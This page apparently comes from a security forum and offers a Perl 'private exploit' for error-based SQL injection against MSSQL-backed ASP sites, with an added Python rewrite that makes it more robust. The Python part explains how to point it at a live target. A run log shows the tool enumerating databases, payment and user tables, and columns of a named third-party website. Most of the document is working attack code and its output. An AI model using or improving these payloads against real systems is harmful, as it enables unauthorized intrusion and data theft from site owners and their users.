MSSQL Database Scanner for SQL Injection
A small program that enumerates the database names, table names and column names of an MSSQL database by SQL injection.
The idea comes from 《MSSQL 跨“COOL”查询,你想怎么玩?》 (roughly "MSSQL cross-database queries: how do you want to play?") by 臭要饭的.黑夜.
It may not be very general; sometimes you will need to make small modifications yourself.
It works by error-based injection: every request appends a subquery to the injectable parameter that makes SQL Server convert a catalog value (a name from sysdatabases, sysobjects or syscolumns, or an object id) to a number, and the resulting conversion error echoes that value in the page, one value per request. The response parser in findstr matches the Chinese-locale error text, so on an English-locale server the regex has to be adjusted.
The workflow is: first scan to get all database names and the tables in each database (using -t table_scan), then take a table name and its table ID from that scan and enumerate all the columns of that table (using -t column_scan).
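The workflow above, rebuilt as an added Python example (this is not the original tool's code; the page's own Perl follows further down). It keeps the scanner's three payload shapes, the name>1 cast against sysdatabases, the top 1 ... not in(...) chain over sysobjects and syscolumns, and the uid>(str(id)) trick for the object id, but differs where a practitioner usually has to patch the Perl: the error parser accepts the English SQL Server 2000 and 2005+ messages as well as the Chinese-locale text, the dbid walk survives a gap left by a dropped database, and one-character names are kept. The target is a constructed in-memory stand-in (FAKE and fake_mssql_page) with a hypothetical catalog so that it runs offline; the movie_detail.asp name and the id values in it are borrowed from the page's transcript purely as sample data.

```python
"""Error-based MSSQL catalog enumeration in Python (added example, not the
scanner's own code). Same oracle as the Perl: force a catalog string through a
numeric conversion and read the value back out of the error message."""
import re
from typing import Callable, Dict, List, Optional

Oracle = Callable[[str], str]  # injected SQL suffix -> HTTP response body

# SQL Server 2000 (English and Chinese locale) and 2005+ error texts all quote the value.
_LEAK_PATTERNS = [
    re.compile(r"converting the n?varchar value '([^']*)'"),
    re.compile(r"n?varchar 值 '([^']*)' 转换"),
]

def extract_leaked_value(body: str) -> Optional[str]:
    """Value quoted in a conversion error, or None; str(id) pads with blanks."""
    for m in (p.search(body) for p in _LEAK_PATTERNS):
        if m:
            return m.group(1).strip()
    return None

def sql_str(value: str) -> str:
    return "'" + value.replace("'", "''") + "'"  # T-SQL literal, quotes doubled

def _not_in(seen: List[str]) -> str:
    return " and name not in(" + ",".join(map(sql_str, seen)) + ")" if seen else ""

def db_name_payload(dbid: int) -> str:
    # name>1 casts the sysname column to int, and the failure leaks the name
    return f" and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid={dbid})"

def table_name_payload(db: str, seen: List[str]) -> str:
    return f" and 0<>(select top 1 name from {db}.dbo.sysobjects where xtype='U'{_not_in(seen)})"

def table_id_payload(db: str, table: str) -> str:
    # uid is smallint, so uid>(str(id)) forces the padded id string to a number
    return (f" and 0<>(select count(*) from {db}.dbo.sysobjects"
            f" where xtype='U' and name={sql_str(table)} and uid>(str(id)))")

def column_name_payload(db: str, table_id: int, seen: List[str]) -> str:
    return f" and 0<>(select top 1 name from {db}.dbo.syscolumns where id={table_id}{_not_in(seen)})"

def enumerate_databases(oracle: Oracle, first_dbid: int = 7, max_gap: int = 3) -> List[str]:
    """Walk dbid upward; unlike the Perl, survive gaps (stop after max_gap misses)."""
    found, dbid, misses = [], first_dbid, 0
    while misses < max_gap:
        name = extract_leaked_value(oracle(db_name_payload(dbid)))
        misses = misses + 1 if name is None else 0
        if name is not None:
            found.append(name)
        dbid += 1
    return found

def _chain(oracle: Oracle, build: Callable[[List[str]], str]) -> List[str]:
    """Repeat 'top 1 name ... not in(seen)' until nothing new leaks."""
    seen: List[str] = []
    while True:
        name = extract_leaked_value(oracle(build(seen)))
        if name is None or name in seen:  # a repeat means the exclusion failed
            return seen
        seen.append(name)

def enumerate_tables(oracle: Oracle, db: str) -> Dict[str, Optional[int]]:
    tables: Dict[str, Optional[int]] = {}
    for name in _chain(oracle, lambda seen: table_name_payload(db, seen)):
        raw = extract_leaked_value(oracle(table_id_payload(db, name)))
        tables[name] = int(raw) if raw and raw.isdigit() else None
    return tables

def enumerate_columns(oracle: Oracle, db: str, table_id: int) -> List[str]:
    return _chain(oracle, lambda seen: column_name_payload(db, table_id, seen))

# Constructed stand-in for the injectable page; the catalog is hypothetical.
FAKE = {"databases": {7: "webmusic", 9: "webshop"},  # dbid 8 deliberately absent
        "tables": {"webmusic": {"movie": 576721107, "movie_user": 1568724641},
                   "webshop": {"brand": 357576312}},
        "columns": {576721107: ["movie_id", "movie_name", "movie_path"]}}
_DB = re.compile(r"sysdatabases where name>1 and dbid=(\d+)\)$")
_TID = re.compile(r"from (\w+)\.dbo\.sysobjects where xtype='U' and name='([^']*)' and uid>\(str\(id\)\)\)$")
_TBL = re.compile(r"from (\w+)\.dbo\.sysobjects where xtype='U'(?: and name not in\((.*)\))?\)$")
_COL = re.compile(r"syscolumns where id=(\d+)(?: and name not in\((.*)\))?\)$")

def fake_mssql_page(suffix: str, english: bool = True) -> str:
    """Normal page if the subquery evaluates cleanly, else the conversion error."""
    def leak(value: str, dtype: str = "int") -> str:
        return (f"Syntax error converting the varchar value '{value}' to a column of data type {dtype}."
                if english else f"将 varchar 值 '{value}' 转换为数据类型为 {dtype} 的列时发生语法错误。")
    def first_unseen(names, excl):
        seen = [s.strip("'") for s in excl.split(",")] if excl else []
        return next((n for n in names if n not in seen), None)
    normal = "<html>movie detail</html>"
    if m := _DB.search(suffix):
        name = FAKE["databases"].get(int(m.group(1)))
        return leak(name) if name else normal
    if m := _TID.search(suffix):
        tid = FAKE["tables"].get(m.group(1), {}).get(m.group(2))
        return leak(str(tid).rjust(10), "smallint") if tid else normal
    if m := _TBL.search(suffix):
        name = first_unseen(FAKE["tables"].get(m.group(1), {}), m.group(2))
        return leak(name) if name else normal
    if m := _COL.search(suffix):
        name = first_unseen(FAKE["columns"].get(int(m.group(1)), []), m.group(2))
        return leak(name) if name else normal
    return normal
```

To point this at a real target, pass an oracle that URL-encodes the suffix onto the injectable parameter and returns the response body; the payload builders leave encoding to that layer, as the Perl leaves it to its %20 literals. max_gap bounds how many consecutive empty dbids are tolerated, where the Perl scan_db stops at the first one.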
D:\temp>scan_sql.pl -h www.vod999.com -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask<envymask@ph4nt0m.net>
Private Codz! Don't distribute it!
===================================================
Usage: D:\temp\scan_sql.pl -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database name> -i <table id>]
-h =hostname you want to scan
-p =port, 80 default
-w =the normal URL you request, such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type, only accepts "table_scan" and "column_scan"
-d =the database name you want to scan, such as "movie"; only used with "column_scan"
-i =the table id you want to scan, such as "1568724641"; you get this id from table_scan; only used with "column_scan"
Eg: D:\temp\scan_sql.pl -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
    D:\temp\scan_sql.pl -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
..
Database name scan complete!
===================================
webmusic
webshop
===================================
..................................................................................................................................................................................................
Database "webmusic" scan complete!
..............
Database "webshop" scan complete!
============== webmusic ==============
| boardcast(117575457) | 9TianOnline(1181247263) | ad(1707153127) | agreeuser(1970106059) |
| answer_find_other(1326627769) | answer_findsinglesong(1310627712) | article(523148909) |
| auth_record(1415676091) | BaoYueOperation(1709249144) | block_ip(1863677687) | charts(759673754) |
| CodeCollate(1088722931) | CongziOperation(1309247719) | consume_record(1915153868) |
| degree(1621580815) | djstation(1154103152) | dtproperties(149575571) | error_geci(331148225) |
| find_other(1342627826) | findsinglesong(1454628225) | geci(1028198713) | GetDropBY(1981250113) |
| guestbook(996198599) | jiaoxue(2020202247) | jxtype(135671531) | license_song(1844201620) |
| lmarticle(2037582297) | lmtree(2021582240) | maga(1198627313) | midi(1684201050) |
| midi_old(1579152671) | midi_subsection(1463676262) | mobile_affirm(1540200537) |
| mobile_code(1252199511) | mobile_comfirm(1351675863) | mobile_operation(1799677459) |
| mobile_pic(1767677345) | mobile_receive(1620200822) | mobiletype(1643152899) |
| movie(576721107) | movie_record(1613248802) | movie_user(1568724641) | movie1(768721791) |
| mtv(427148567) | musicuser(1717581157) | my(125243501) | mystation(2002106173) |
| nnews(868198143) | nnews_history(1531152500) | no_singlesong(1358627883) |
| onlineuser(1099150961) | p2puser(717245610) | pay_card(151671588) | pay_money(2075154438) |
| pay_record_9sky(1952726009) | pay_record_9tian(845246066) | pay_record_cg2dv(653245382) |
| pay_record_likex(605245211) | pay_record_moviethat(2000726180) | pay_record_vod999(2032726294) |
| pbcatcol(181575685) | pbcatedt(197575742) | pbcatfmt(213575799) | pbcattbl(229575856) |
| pbcatvld(245575913) | phb(750625717) | picture(603149194) | RECORDIN(130099504) |
| Results(1515152443) | ring(1191675293) | rqzs(277576027) | sarticle(2069582411) |
| self(1314103722) | send_record(1652200936) | send_song(2068202418) | singer(201767776) |
| singlesong(340196262) | singlesong_shonline(1856725667) | singlesong_zhengzhou(1220199397) |
| sms(231671873) | sms_img(839674039) | sms_text(727673640) | sms_text_type(1796201449) |
| sms_user(1840725610) | song(148195578) | study(1246627484) | studytype(1262627541) |
| style(1547152557) | syrg(1390627997) | tempuser(322100188) | tempvip(1348199853) |
| txt(1989582126) | unite_baoyue(941246408) | user_activity(2096726522) | users(1973582069) |
| vipuser(1456724242) | vox_xs(1303675692) | ydd(1374627940)
============== webshop ==============
| brand(357576312) | class(645577338) | dtproperties(1977058079) | guestbook(837578022) |
| order(741577680) | product(709577566) | user(597577167)
D:\temp>
#We found the table id of webmusic.dbo.movie is 576721107
D:\temp>scan_sql.pl -h www.vod999.com -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d webmusic -i 576721107
...........................
============== webmusic.dbo.576721107 ==============
| movie_actor | movie_area | movie_authnum | movie_ddj | movie_direct | movie_dj | movie_djnum |
| movie_dntype | movie_filename | movie_filesize | movie_filetype | movie_free | movie_id |
| movie_img | movie_intro | movie_m1id | movie_mdj | movie_name | movie_num | movie_path |
| movie_price | movie_seed | movie_smovie | movie_soundtrack | movie_time | movie_type | movie_updatetime
D:\temp>
Perl code:
#!/usr/bin/perl
# Private Exploit! Don't distribute it!
# Error-based MSSQL catalog enumeration over HTTP: every request appends a
# subquery to the injectable URL, and the conversion error that comes back
# leaks one catalog name or object id.
$|=1;
use Socket;
use Getopt::Std;
getopt('hpwtdi');
$host=$opt_h || "www.vod999.com";
$port=$opt_p || 80;
$path=$opt_w || "/movie_detail.asp?movie_m1id=1264";
$type=$opt_t || "table_scan";
$database=$opt_d;
$tab_id=$opt_i;
usage();
if($type eq "table_scan")
{
    scan_db();
    print "\nDatabase name scan complete!\n===================================\n";
    foreach (@sqldb)
    {
        print "$_\n";
    }
    print "===================================\n";
    scan_table(@sqldb);
    for($i=0;$i<@sqldb;$i++)
    {
        print "\n\n============== $sqldb[$i] ==============\n\n";
        # scan_table stored the names and ids newline-separated, one per table
        @tb=split(/\n/,$table_name[$i]);
        @tbid=split(/\n/,$table_id[$i]);
        for($j=0;$j<@tb;$j++)
        {
            print "| $tb[$j]($tbid[$j])\t";
        }
    }
}
elsif(($type eq "column_scan") && ($database ne "") && ($tab_id ne ""))
{
    scan_columns($database,$tab_id);
    print "\n============== $database.dbo.$tab_id ==============\n\n";
    foreach (@columns)
    {
        print "| $_\t";
    }
}

# Send one raw HTTP request to the target and return the response lines.
sub sendraw
{
    my ($req)=@_;
    my $target=inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,sockaddr_in($port,$target)))
    {
        select(S);
        $|=1;
        print $req;
        my @res=<S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else
    {
        die("Can't connect...\n");
    }
}

# Enumerate database names by walking dbid upward from 7 (1 to 6 are the
# stock system and sample databases on SQL Server 2000). "name>1" makes the
# server cast the name to int, and the conversion error echoes it. The loop
# ends at the first dbid that yields no name, so a gap left by a dropped
# database hides every database above it.
sub scan_db
{
    my $i=7;
    my ($req,$get);
    my $db=1;
    my @res;
    while($db ne "not found")
    {
        $get=$path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$i)";
        $req=make_request($get);
        @res=sendraw($req);
        $db=findstr(@res);
        if($db ne "not found")
        {
            push(@sqldb,$db);
        }
        $i++;
    }
}

# Pull the leaked value out of the server's conversion error. The pattern
# matches the Chinese-locale SQL Server 2000 message
# ("将 varchar 值 'xxx' 转换为数据类型为 int 的列时发生语法错误"); an English
# server says "Syntax error converting the varchar value 'xxx' to a column
# of data type int", so adjust the regex to the target's locale.
sub findstr
{
    my @tmpres=@_;
    my $tmpline;
    my ($s1,$s2,$s3);
    foreach $tmpline (@tmpres)
    {
        if($tmpline=~/char 值.*转换/is)
        {
            ($s1,$s2,$s3)=split(/'/,$tmpline);
            $s2=~s/ //g;           # str(id) pads the object id with blanks
            print ".";
            if(length($s2) > 1)    # note: one-character names are dropped
            {
                return $s2;
            }
        }
    }
    return "not found";
}

# For each database, ask for "top 1 name ... not in(<names seen so far>)"
# until the server leaks nothing new. For every table, fetch its object id
# with uid>(str(id)): uid is smallint, so str(id) is forced through a numeric
# conversion and the error echoes the id. Names and ids are accumulated
# newline-separated in $table_name[$i] and $table_id[$i].
sub scan_table
{
    my @db=@_;
    my ($req,$get);
    my $table;
    my @res;
    my $tmpstr1;
    my $i=0;
    my $tableid;
    my $db_name;
    foreach $db_name (@db)
    {
        $tmpstr1="";
        $table_name[$i]="";
        $table_id[$i]="";
        while(1)
        {
            $get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'";
            $get.="%20and%20name%20not%20in($tmpstr1)" if($tmpstr1 ne "");
            $get.=")";
            $req=make_request($get);
            @res=sendraw($req);
            $table=findstr(@res);
            last if($table eq "not found");
            $table_name[$i].="$table\n";
            $get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)))";
            $req=make_request($get);
            @res=sendraw($req);
            $tableid=findstr(@res);
            $table_id[$i].="$tableid\n";
            $tmpstr1.="," if($tmpstr1 ne "");
            $tmpstr1.="'$table'";
        }
        print "\nDatabase \"$db_name\" scan complete!\n";
        $i++;
    }
}

# The same chaining over syscolumns for one table id.
sub scan_columns
{
    my $this_db_name=shift;
    my $this_table_id=shift;
    my ($get,$req,$tmpstr);
    my @res;
    my $column;
    $tmpstr="";
    while(1)
    {
        $get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id";
        $get.="%20and%20name%20not%20in($tmpstr)" if($tmpstr ne "");
        $get.=")";
        $req=make_request($get);
        @res=sendraw($req);
        $column=findstr(@res);
        last if($column eq "not found");
        push(@columns,$column);
        $tmpstr.="," if($tmpstr ne "");
        $tmpstr.="'$column'";
    }
}

sub make_request
{
    my $getstr=shift;
    my $reqstr="GET $getstr HTTP/1.0\r\n".
               "Host: $host\r\n\r\n";
    return $reqstr;
}

sub usage
{
    print qq~
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask<envymask\@ph4nt0m.net>
===================================================
Usage: $0 -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database name> -i <table id>]
-h =hostname you want to scan
-p =port, 80 default
-w =the normal URL you request, such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type, only accepts "table_scan" and "column_scan"
-d =the database name you want to scan, such as "movie"; only used with "column_scan"
-i =the table id you want to scan, such as "1568724641"; you get this id from table_scan; only used with "column_scan"
Eg: $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
    $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
~;
}